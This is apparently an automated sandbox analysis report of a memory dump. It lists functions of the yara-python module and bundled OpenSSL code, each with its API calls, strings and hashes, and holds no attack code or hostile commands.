PyModule_AddStringConstant.PYTHON27(00000000,YARA_VERSION,3.10.0), ref: 02DA2925
PyModule_AddIntConstant.PYTHON27(00000000,YARA_VERSION_HEX,00030A00), ref: 02DA2932
PyErr_NewException.PYTHON27(yara.Error,?,00000000), ref: 02DA2949
PyErr_NewException.PYTHON27(yara.SyntaxError,00000000,00000000,?,00000000), ref: 02DA2958
PyErr_NewException.PYTHON27(yara.TimeoutError,02AFA790,00000000,?,00000000), ref: 02DA296D
PyErr_NewException.PYTHON27(yara.WarningError,02AFA790,00000000,?,00000000), ref: 02DA2981
PyType_Ready.PYTHON27(02EB5310), ref: 02DA2996
PyType_Ready.PYTHON27(02EB5450), ref: 02DA29A8
PyType_Ready.PYTHON27(02EB5188), ref: 02DA29BA
PyModule_AddObject.PYTHON27(00000000,Rule,02EB5310), ref: 02DA29D8
PyModule_AddObject.PYTHON27(00000000,Rules,02EB5450), ref: 02DA29E5
PyModule_AddObject.PYTHON27(00000000,Match,02EB5188), ref: 02DA29F2
PyModule_AddObject.PYTHON27(00000000,Error,02AFA790), ref: 02DA2A01
PyModule_AddObject.PYTHON27(00000000,SyntaxError,02AFA968), ref: 02DA2A10
PyModule_AddObject.PYTHON27(00000000,TimeoutError,02AFAB40), ref: 02DA2A1E
PyModule_AddObject.PYTHON27(00000000,WarningError,02AFAD18), ref: 02DA2A30

Part of subcall function 02DB3930: _time64.MSVCR90 ref: 02DB3949
Part of subcall function 02DB3930: srand.MSVCR90 ref: 02DB3950
Part of subcall function 02DB3930: tolower.MSVCR90 ref: 02DB3994

PyErr_SetString.PYTHON27(02AFA790,initialization error), ref: 02DA2A4A
Py_AtExit.PYTHON27(02DA2890), ref: 02DA2A5C

Strings

Error, xrefs: 02DA29FB
Match, xrefs: 02DA29EC
3.10.0, xrefs: 02DA291A
yara.TimeoutError, xrefs: 02DA2963
yara.Error, xrefs: 02DA2944
Rule, xrefs: 02DA29D2
CALLBACK_CONTINUE, xrefs: 02DA28D4
Rules, xrefs: 02DA29DF
CALLBACK_MATCHES, xrefs: 02DA28E8
This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara, xrefs: 02DA28A8
CALLBACK_ABORT, xrefs: 02DA28DE
yara, xrefs: 02DA28B2
SyntaxError, xrefs: 02DA2A0A
__version__, xrefs: 02DA290F
CALLBACK_NON_MATCHES, xrefs: 02DA28F2
yara.WarningError, xrefs: 02DA297C
yara.SyntaxError, xrefs: 02DA294E
initialization error, xrefs: 02DA2A44
YARA_VERSION_HEX, xrefs: 02DA292C
YARA_VERSION, xrefs: 02DA291F
WarningError, xrefs: 02DA2A2A
TimeoutError, xrefs: 02DA2A18
CALLBACK_ALL, xrefs: 02DA28FC
3.10.0, xrefs: 02DA290A

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Module_$Constant$Object$Err_$Exception$ReadyStringType_$ExitInitModule4_time64srandtolower
String ID: 3.10.0$3.10.0$CALLBACK_ABORT$CALLBACK_ALL$CALLBACK_CONTINUE$CALLBACK_MATCHES$CALLBACK_NON_MATCHES$Error$Match$Rule$Rules$SyntaxError$This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara$TimeoutError$WarningError$YARA_VERSION$YARA_VERSION_HEX$__version__$initialization error$yara$yara.Error$yara.SyntaxError$yara.TimeoutError$yara.WarningError
API String ID: 4234569520-1936999633
Opcode ID: 47db9c95b36ce149c2894129a0c74eb6552b6a57a52e7fda885230247df382f1
Instruction ID: 6ff9e3f133fae2a5b5896081d43a0ff1ead972e052c3e1549c2b3a3ae0d8ae78
Opcode Fuzzy Hash: 47db9c95b36ce149c2894129a0c74eb6552b6a57a52e7fda885230247df382f1
Instruction Fuzzy Hash: DD41D731BC07447AF12377676C0FFDFA35CDF98B44F95A861F50262240C7D1A5528AA9

Uniqueness

Uniqueness Score: -1.00%

Function 02DA2060, Relevance: 77.5, APIs: 33, Strings: 11, Instructions: 477COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|ssOOOOOOO,02EB5ADC,?,?,?,?,?,?,?,?,?), ref: 02DA20D4
PyObject_IsTrue.PYTHON27(?), ref: 02DA2132
PyObject_IsTrue.PYTHON27(?), ref: 02DA2163
PyCallable_Check.PYTHON27(?), ref: 02DA2185
PyErr_Format.PYTHON27(?,'include_callback' must be callable,?), ref: 02DA21BB

Strings

'includes' param must be of boolean type, xrefs: 02DA21D4
'include_callback' must be callable, xrefs: 02DA219C
'sources' must be a dictionary, xrefs: 02DA23E1
keys and values of the 'sources' dictionary must be of string type, xrefs: 02DA23D0
'file' is not a file object, xrefs: 02DA232B
'externals' must be a dictionary, xrefs: 02DA2250
filepaths must be a dictionary, xrefs: 02DA2571
keys and values of the filepaths dictionary must be of string type, xrefs: 02DA255D
'error_on_warning' param must be of boolean type, xrefs: 02DA21AD
|ssOOOOOOO, xrefs: 02DA20A1
compile() takes 1 argument, xrefs: 02DA2598

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Object_True$Arg_Callable_CheckErr_FormatKeywords_ParseSizeTuple
String ID: 'error_on_warning' param must be of boolean type$'externals' must be a dictionary$'file' is not a file object$'include_callback' must be callable$'includes' param must be of boolean type$'sources' must be a dictionary$compile() takes 1 argument$filepaths must be a dictionary$keys and values of the 'sources' dictionary must be of string type$keys and values of the filepaths dictionary must be of string type$|ssOOOOOOO
API String ID: 4212806499-3333253616
Opcode ID: 332f2e09b8b1e45c2d00875a2cb1dd6bc2c40abc931406aa23636af14c4da257
Instruction ID: c5149ba9ef267402c7db547f81a3a0b310a92fb4fd35d6493f238558313eace0
Opcode Fuzzy Hash: 332f2e09b8b1e45c2d00875a2cb1dd6bc2c40abc931406aa23636af14c4da257
Instruction Fuzzy Hash: 02F1A1B6984340ABD600DF66D8A8C6B77A9FF84744F584D1DF98683300E731ED54CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02DA31D0, Relevance: 40.6, APIs: 15, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02DA325C
PyErr_Format.PYTHON27(?,'externals' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02DA328D
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02DA32AD
PyErr_Format.PYTHON27(20000000,'modules_data' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02DA32C3
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02DA32DD
PyErr_Format.PYTHON27(00000000,'modules_callback' must be callable), ref: 02DA32F4

Strings

'callback' must be callable, xrefs: 02DA32B6
'modules_callback' must be callable, xrefs: 02DA32EE
'externals' must be a dictionary, xrefs: 02DA3368
match() takes at least one argument, xrefs: 02DA327F
<data>, xrefs: 02DA34F3
'modules_data' must be a dictionary, xrefs: 02DA331A
<proc>, xrefs: 02DA3511
|sis#OOOiOOi, xrefs: 02DA321D

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format$Callable_Check$Arg_Keywords_ParseSizeTuple
String ID: 'callback' must be callable$'externals' must be a dictionary$'modules_callback' must be callable$'modules_data' must be a dictionary$<data>$<proc>$match() takes at least one argument$|sis#OOOiOOi
API String ID: 1778487156-647612975
Opcode ID: 988d70529e364dce40b7a34846e17924e2563aa0dc1ec48c8d2ca36fa3d2bbea
Instruction ID: dbe26fd333bff969ff36d3d07ac7fb7b3754e26b879fe56ebe02c1a32c77102d
Opcode Fuzzy Hash: 988d70529e364dce40b7a34846e17924e2563aa0dc1ec48c8d2ca36fa3d2bbea
Instruction Fuzzy Hash: 96A1B276A843449FD310DFA5E894C5BB7E9FB88714F94896EF88582300D735E854CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA2610, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 217threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|sO,02EB5CDC,?,?), ref: 02DA2642
PyObject_Malloc.PYTHON27(00000014,02EB5450), ref: 02DA266C
PyObject_Init.PYTHON27(00000000), ref: 02DA2676
PyEval_SaveThread.PYTHON27 ref: 02DA268B
PyEval_RestoreThread.PYTHON27(?,?,0000000C), ref: 02DA26AC

Strings

|sO, xrefs: 02DA2631
read, xrefs: 02DA2700
<file-like-object>, xrefs: 02DA276F
load() expects either a file path or a file-like object, xrefs: 02DA285C

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Object_Thread$Arg_InitKeywords_MallocParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$read$|sO
API String ID: 2305183799-969849776
Opcode ID: 16b7ced7b98edac5d3d53e1c776465432e549a8862d72510a6d348e0559ad396
Instruction ID: c78913c93b3b529560b42c0104abae12dc18ae1e7c4fcde9fa9813ae76e6593c
Opcode Fuzzy Hash: 16b7ced7b98edac5d3d53e1c776465432e549a8862d72510a6d348e0559ad396
Instruction Fuzzy Hash: DC61A375A803019BC210DF6AEC8CC6BB7A8FF48765B544A59FD4A83300D731ED65CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DA3C90, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02DA3CAB
printf.MSVCR90 ref: 02DA3CDA
printf.MSVCR90 ref: 02DA3CF5
printf.MSVCR90 ref: 02DA3D0A
printf.MSVCR90 ref: 02DA3D25
printf.MSVCR90 ref: 02DA3D38
printf.MSVCR90 ref: 02DA3D61
printf.MSVCR90 ref: 02DA3D7C
printf.MSVCR90 ref: 02DA3DA4
printf.MSVCR90 ref: 02DA3DB8
printf.MSVCR90 ref: 02DA3DE1
printf.MSVCR90 ref: 02DA3DEE
printf.MSVCR90 ref: 02DA3E03

Strings

%s = , xrefs: 02DA3D20
%p childs:%d depth:%d failure:%p, xrefs: 02DA3CD5
%02x , xrefs: 02DA3D5C

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02x $%p childs:%d depth:%d failure:%p$%s =
API String ID: 3524737521-1131531689
Opcode ID: 6ab1216e7dc85c634c61ca1a0abd07b5bc7aaefc1170ac9eb3ef08d067ea1c8a
Instruction ID: 69e42586de58d59c80a14a422ef57153b16c1545cbf55fff9f3dc04f9fedacfe
Opcode Fuzzy Hash: 6ab1216e7dc85c634c61ca1a0abd07b5bc7aaefc1170ac9eb3ef08d067ea1c8a
Instruction Fuzzy Hash: 68413B706802149BFB658B5DCCA1E7B7757AF80104F0590A6FC8B4B301EA60ED51CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1250, Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 70COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02AFA790,could not open file "%s",?), ref: 02DA129C
PyErr_Format.PYTHON27(02AFA790,could not map file "%s" into memory,?), ref: 02DA12B7
PyErr_Format.PYTHON27(02AFA790,invalid rules file "%s",?), ref: 02DA12D2
PyErr_Format.PYTHON27(02AFA790,corrupt rules file "%s",?), ref: 02DA12EC
PyErr_Format.PYTHON27(02AFA790,external variable "%s" was already defined with a different type,?), ref: 02DA131E
PyErr_Format.PYTHON27(02AFA790,rules file "%s" is incompatible with this version of YARA,?), ref: 02DA1339
PyErr_Format.PYTHON27(02AFA790,internal error: %d), ref: 02DA134F

Strings

invalid rules file "%s", xrefs: 02DA12CC
corrupt rules file "%s", xrefs: 02DA12E6
could not map file "%s" into memory, xrefs: 02DA12B1
rules file "%s" is incompatible with this version of YARA, xrefs: 02DA1333
external variable "%s" was already defined with a different type, xrefs: 02DA1318
internal error: %d, xrefs: 02DA1349
scanning timed out, xrefs: 02DA12F6, 02DA1317
could not open file "%s", xrefs: 02DA1296
access denied, xrefs: 02DA126E, 02DA1295

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: access denied$corrupt rules file "%s"$could not map file "%s" into memory$could not open file "%s"$external variable "%s" was already defined with a different type$internal error: %d$invalid rules file "%s"$rules file "%s" is incompatible with this version of YARA$scanning timed out
API String ID: 376477240-1552458549
Opcode ID: 99b17c73b676ab4128af00f0d6c196437cda95b90d24611b67762473bc115c56
Instruction ID: bc2cfa03b4cfcae41af2da8c78cd1556e39dd48a8a35049a78e234e20a012e1c
Opcode Fuzzy Hash: 99b17c73b676ab4128af00f0d6c196437cda95b90d24611b67762473bc115c56
Instruction Fuzzy Hash: E0213D759C4241EFD700CB62E84DCAB3BB5BB88745BE8DC9DF48943204C232D9A5CB19

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1A10, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

PyErr_SetNone.PYTHON27(?), ref: 02DA1A34
PyObject_Malloc.PYTHON27(00000014,02EB5310), ref: 02DA1A53
PyObject_Init.PYTHON27(00000000), ref: 02DA1A5D
PyList_New.PYTHON27(00000000), ref: 02DA1A6B
PyDict_New.PYTHON27 ref: 02DA1A7A
PyString_FromString.PYTHON27(?), ref: 02DA1AB7
PyList_Append.PYTHON27(00000000,00000000), ref: 02DA1AC1
_Py_BuildValue_SizeT.PYTHON27(02EB5778,?,?), ref: 02DA1B2C
PyDict_SetItemString.PYTHON27(?,?,00000000), ref: 02DA1B5D

Strings

Out of memory, xrefs: 02DA1BE8

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_List_Object_String$AppendBuildErr_FromInitItemMallocNoneSizeString_Value_
String ID: Out of memory
API String ID: 1441624211-696950042
Opcode ID: a670a746dbcfe1d6569f31a34949232b048a6da47f856a6ad9ae7fdad3e92451
Instruction ID: 3896d6979e5c1008b7ee04dd2039e2c56040b22d6f913a5f1fdf22d7591efd78
Opcode Fuzzy Hash: a670a746dbcfe1d6569f31a34949232b048a6da47f856a6ad9ae7fdad3e92451
Instruction Fuzzy Hash: E351D475A803008FC710CF28E888E6773A4FF89764F688A59EC5987341E735ED56CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9770, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 157registryfilewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4), ref: 02DE978C
GetFileType.KERNEL32(00000000), ref: 02DE9799
_vsnprintf.MSVCR90 ref: 02DE97B7
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02DE97DA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?), ref: 02DE981C
_vsnwprintf.MSVCR90 ref: 02DE98B0
GetVersion.KERNEL32 ref: 02DE98BE
RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 02DE98DB
ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02DE9909
DeregisterEventSource.ADVAPI32(00000000), ref: 02DE9910
MessageBoxW.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 02DE9928

Strings

OpenSSL: FATAL, xrefs: 02DE991A
OpenSSL, xrefs: 02DE98D4
no stack?, xrefs: 02DE980A

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWrite_vsnprintf_vsnwprintf
String ID: OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 3866500927-278800372
Opcode ID: 42c16af0a320548c61990dcba00c7fc3bfb96616b29ad4aecf17eeb47c6bd3a4
Instruction ID: 506cfac4e93d3314f101a517f892cd3cc5b3c4badc1827444ad0abb34c2c9ef2
Opcode Fuzzy Hash: 42c16af0a320548c61990dcba00c7fc3bfb96616b29ad4aecf17eeb47c6bd3a4
Instruction Fuzzy Hash: 4C513730981315AADF20AB61CCADBEB3779EF44740F109459E96B9B390EB709D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1E40, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02DA1E58
PyString_FromString.PYTHON27(?), ref: 02DA1E71
PyString_FromString.PYTHON27(?), ref: 02DA1E8C
PyString_FromString.PYTHON27(?), ref: 02DA1EA7
PyErr_Fetch.PYTHON27(?,?,?), ref: 02DA1EC7
PyObject_CallFunctionObjArgs.PYTHON27(?,6E56FB3D,6E56FB3D,6E56FB3D,00000000), ref: 02DA1ED6
PyErr_Restore.PYTHON27(?,?,?), ref: 02DA1EED
PyString_AsString.PYTHON27(00000000), ref: 02DA1F44
_strdup.MSVCR90(00000000), ref: 02DA1F4B
PyErr_Occurred.PYTHON27 ref: 02DA1F57
PyErr_Format.PYTHON27(00000000,'include_callback' function must return a yara rules as an ascii or unicode string), ref: 02DA1F6F
PyGILState_Release.PYTHON27(?), ref: 02DA1F92

Strings

'include_callback' function must return a yara rules as an ascii or unicode string, xrefs: 02DA1F69

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_StringString_$From$State_$ArgsCallEnsureFetchFormatFunctionObject_OccurredReleaseRestore_strdup
String ID: 'include_callback' function must return a yara rules as an ascii or unicode string
API String ID: 901655891-1855780161
Opcode ID: 13b7195c3f58b4139a0917c60dbb91cc364e30bb70315734f4ccc8f731661e9f
Instruction ID: e600d777d692e64abd3f114d3dd904bb5c157396d046caba4f9cefd125f43553
Opcode Fuzzy Hash: 13b7195c3f58b4139a0917c60dbb91cc364e30bb70315734f4ccc8f731661e9f
Instruction Fuzzy Hash: A441E3B2984341AFC700DF65D88CC5B77A8BF88264F584A6DF99A87340D330ED55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E609E0, Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 276stringCOMMON

Download Yara Rule

APIs

strtoul.MSVCR90 ref: 02E60AB3
strtoul.MSVCR90 ref: 02E60B4B

Strings

mask, xrefs: 02E60B69
none, xrefs: 02E60C35
name=, xrefs: 02E60CEC
flags, xrefs: 02E60BC2
min, xrefs: 02E60A73
, value=, xrefs: 02E60AFA, 02E60CE6
nomask, xrefs: 02E60C00
..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c, xrefs: 02E60AD2, 02E60CB1
max, xrefs: 02E60B11
field=, xrefs: 02E60B00

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: strtoul
String ID: , value=$..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c$field=$flags$mask$max$min$name=$nomask$none
API String ID: 3805803174-245016966
Opcode ID: 977674adc801859cdb04334be12aa93d772f49a63292dbb59e4a8cf1e91bbad5
Instruction ID: ed09b6c7c8bf422eec682d3b5f0c05553934269826825a7dd206b93d3fbf55ce
Opcode Fuzzy Hash: 977674adc801859cdb04334be12aa93d772f49a63292dbb59e4a8cf1e91bbad5
Instruction Fuzzy Hash: 1E914B716D82515ADB109F34CC99B737B97BF512DCF08E558E8899B282E323D90CC791

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1C00, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02DA1C31
PyEval_SaveThread.PYTHON27(?,?,?,?,?,?,?,?), ref: 02DA1C4A
PyEval_RestoreThread.PYTHON27(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02DA1C67

Strings

load() expects either a file path or a file-like object, xrefs: 02DA1D0A
<file-like-object>, xrefs: 02DA1CDD
|sO, xrefs: 02DA1C1A
write, xrefs: 02DA1C90

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Thread$Arg_Keywords_ParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$write$|sO
API String ID: 2135743336-3765213004
Opcode ID: 878a5fa91564b9cab5ad651609c227b3414ddc23d27ad6c52c8f09fee9cb54d8
Instruction ID: 610563d3bcd6722ecfb5be5ca11e982a0634f33be2809529b21f590a3439af41
Opcode Fuzzy Hash: 878a5fa91564b9cab5ad651609c227b3414ddc23d27ad6c52c8f09fee9cb54d8
Instruction Fuzzy Hash: 0431A675980300AFD200EB19D85DE5BB7E4FFC4759F984969FC8983301E734DA54CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1520, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02DA1547
PyString_AsString.PYTHON27(?,?), ref: 02DA1565
